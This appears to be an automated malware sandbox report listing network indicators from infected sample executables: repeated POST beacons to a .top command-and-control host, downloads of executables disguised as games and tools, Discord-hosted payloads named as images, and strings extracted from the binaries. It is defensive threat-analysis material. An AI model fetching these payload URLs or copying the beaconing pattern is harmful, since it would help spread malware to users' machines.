52 69 63 68 43 34 77 c7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 07 99 f0 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 de 0b 00 00 c4 70 02 00 00 00 00 a0 e2 09 00 00 10 00 00 00 f0 0b 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 e0 7c 02 00 04 00 00 4c e6 0d 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f4 e0 0b 00 50 00 00 00 00 70 7b 02 a8 3f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 7b 02 44 1b 00 00 30 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 d7 09 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 d8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 18 dc 0b 00 00 10 00 00 00 de 0b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 a4 69 6f 02 00 f0 0b 00 00 16 00 00 00 e2 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 75 77 6f 6d 75 78 e5 02 00 00 00 60 7b 02 00 04 00 00 00 f8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 a8 3f 00 00 00 70 7b 02 00 40 00 00 00 fc 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 22 01 00 00 b0 7b 02 00 24 01 00 00 3c 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.4:49841 version: TLS 1.0
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jaqhuuufk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 250Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lhnqxhhk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 150Host: hajezey1.top
Source: global traffic HTTP traffic detected: GET /downloads/toolspab2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacytoolzforyou-6000.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uktwknfaq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 122Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fnyhcr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 262Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kejrjwxwy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 247Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wijjlglvpi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 181Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://chbebm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 336Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://foxbbmduqm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 342Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uneqpmoi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 198Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iakfv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 203Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hbocfb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 338Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xnalq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 208Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qflbfkys.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 226Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jyhduujjq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 194Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yetpvqx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 232Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jkbenmco.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 166Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jpjsnfgtc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 308Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jkmns.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 294Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jwvrimo.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 205Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kfnisufi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 305Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xoynqlbjnc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 188Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xwytsoqpb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 120Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ipaup.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 195Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://etkxss.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 233Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://shpjiv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 128Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wmbmyysgg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 218Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hpmdwx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 180Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lmmge.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 153Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fexsjalrxu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 156Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xxlvxgkbvo.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 175Host: hajezey1.top
Source: global traffic HTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sysaheu90.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bfxffaryp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 353Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://blprmuxml.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 349Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tkemri.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 285Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uereap.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 263Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://muywwft.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 149Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yfayr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 271Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sivhm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 293Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uwebveg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 332Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lsmjboth.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 160Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ucowlihgbp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 288Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vchmiecd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 351Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pmltrxuim.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 130Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tdbyxcrg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 364Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hmoapn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 207Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sefui.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 228Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rjpartffs.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 260Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 234Host: nusurtal4f.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 352Host: nusurtal4f.net
Source: global traffic HTTP traffic detected: GET /dl/buildz.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: znpst.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 335Host: nusurtal4f.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 316Host: nusurtal4f.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 212Host: nusurtal4f.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 362Host: nusurtal4f.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 224Host: nusurtal4f.net
Source: 3C84.exe, 00000017.00000002.1153886461.00000000011DC000.00000004.00000020.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 5483.exe, 0000001B.00000003.890205524.0000000002F0C000.00000004.00000001.sdmp String found in binary or memory: http://telegalive.top/
Source: 5483.exe, 0000001B.00000003.903420999.0000000002F0C000.00000004.00000001.sdmp String found in binary or memory: http://telegalive.top/T#
Source: 3C84.exe, 3C84.exe, 00000017.00000002.1072066961.0000000000B12000.00000002.00020000.sdmp String found in binary or memory: http://tempuri.org/DetailsDataSet1.xsd
Source: 9415.exe, 0000001D.00000003.911648441.0000000006141000.00000004.00000001.sdmp String found in binary or memory: http://www.ascendercorp.com/typedesigners.html
Source: 9415.exe, 0000001D.00000003.937281677.000000000611D000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: 9415.exe, 0000001D.00000003.924591601.000000000611F000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comB.TTF
Source: 9415.exe, 0000001D.00000003.920199088.000000000611E000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comC.TTF
Source: 9415.exe, 0000001D.00000003.937281677.000000000611D000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comF
Source: 9415.exe, 0000001D.00000003.937281677.000000000611D000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comFq
Source: 9415.exe, 0000001D.00000003.924591601.000000000611F000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comd
Source: 9415.exe, 0000001D.00000003.937281677.000000000611D000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comessed
Source: 9415.exe, 0000001D.00000003.937281677.000000000611D000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.como
Source: 9415.exe, 0000001D.00000003.924591601.000000000611F000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.comtue
Source: 9415.exe, 0000001D.00000003.900774797.0000000006141000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: 9415.exe, 0000001D.00000003.912397872.000000000611E000.00000004.00000001.sdmp, 9415.exe, 0000001D.00000003.904581483.0000000006117000.00000004.00000001.sdmp, 9415.exe, 0000001D.00000003.910887017.000000000611A000.00000004.00000001.sdmp, 9415.exe, 0000001D.00000003.903625198.000000000611E000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: 9415.exe, 0000001D.00000003.904581483.0000000006117000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp//
Source: 9415.exe, 0000001D.00000003.912899676.000000000611E000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/8?QRs
Source: 9415.exe, 0000001D.00000003.904581483.0000000006117000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/9
Source: 9415.exe, 0000001D.00000003.910887017.000000000611A000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/B
Source: 9415.exe, 0000001D.00000003.910887017.000000000611A000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/T
Source: 9415.exe, 0000001D.00000003.912397872.000000000611E000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0
Source: 9415.exe, 0000001D.00000003.904581483.0000000006117000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: 9415.exe, 0000001D.00000003.904581483.0000000006117000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/~
Source: AdvancedRun.exe, AdvancedRun.exe, 0000001C.00000000.873666893.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000001F.00000002.905961037.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000023.00000002.908653076.000000000040C000.00000002.00020000.sdmp String found in binary or memory: http://www.nirsoft.net/
Source: 9415.exe, 0000001D.00000003.912397872.000000000611E000.00000004.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: 9415.exe, 0000001D.00000003.937281677.000000000611D000.00000004.00000001.sdmp String found in binary or memory: http://www.urwpp.de
Source: 9415.exe, 0000001D.00000003.901528364.0000000006141000.00000004.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: 9415.exe, 0000001D.00000003.901528364.0000000006141000.00000004.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn-:
Source: 9415.exe, 0000001D.00000003.901528364.0000000006141000.00000004.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cno.n)N
Source: 9415.exe, 0000001D.00000003.901528364.0000000006141000.00000004.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cnx)T
Source: 5483.exe, 0000001B.00000003.936534003.000000004DB61000.00000004.00000010.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: aspnet_regbrowsers.exe, 00000025.00000000.924712591.0000000000402000.00000040.00000001.sdmp String found in binary or memory: https://api.ip.sb/ip
Source: 3C84.exe String found in binary or memory: https://cdn.discordapp.com/attachments/8
Source: 3C84.exe, 3C84.exe, 00000017.00000002.1072066961.0000000000B12000.00000002.00020000.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/902526114763767818/A623D0D3.jpg
Source: 3C84.exe, 00000017.00000002.1072066961.0000000000B12000.00000002.00020000.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/902526117016109056/AB0F9338.jpg
Source: 5483.exe, 0000001B.00000003.936534003.000000004DB61000.00000004.00000010.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 5483.exe, 0000001B.00000003.936534003.000000004DB61000.00000004.00000010.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 5483.exe, 0000001B.00000003.936534003.000000004DB61000.00000004.00000010.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 5483.exe, 0000001B.00000003.936534003.000000004DB61000.00000004.00000010.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 5483.exe, 0000001B.00000003.936534003.000000004DB61000.00000004.00000010.sdmp String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 5483.exe, 0000001B.00000003.936534003.000000004DB61000.00000004.00000010.sdmp String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 5483.exe, 0000001B.00000003.936534003.000000004DB61000.00000004.00000010.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown DNS traffic detected: queries for: xacokuo8.top
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/903575517888925756/6D9E3C88.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/903575519373697084/F83CB811.jpg HTTP/1.1Host: cdn.discordapp.com
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/903702020781907998/4D0A6361.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/902526114763767818/A623D0D3.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /attachments/893177342426509335/902526117016109056/AB0F9338.jpg HTTP/1.1Host: cdn.discordapp.com
Source: global traffic HTTP traffic detected: GET /downloads/toolspab2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacytoolzforyou-6000.top
Source: global traffic HTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sysaheu90.top
Source: global traffic HTTP traffic detected: GET /agrybirdsgamerept HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: toptelete.top
Source: global traffic HTTP traffic detected: GET //l/f/ip0YyXwB3dP17SpzPFlO/7c7502fb88fbef5f30b90af154a6ea21b780c146 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 91.219.236.97
Source: global traffic HTTP traffic detected: GET /dl/buildz.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: znpst.top
Source: global traffic HTTP traffic detected: GET //l/f/ip0YyXwB3dP17SpzPFlO/0d74e69ed04647decaae0af5f3dee7a1ada201c0 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 91.219.236.97
Source: unknown Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49856 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49856
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49800
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 29 Oct 2021 18:49:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 0d 0a 14 00 00 00 7b fa f0 1e b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 19{i+,GO0
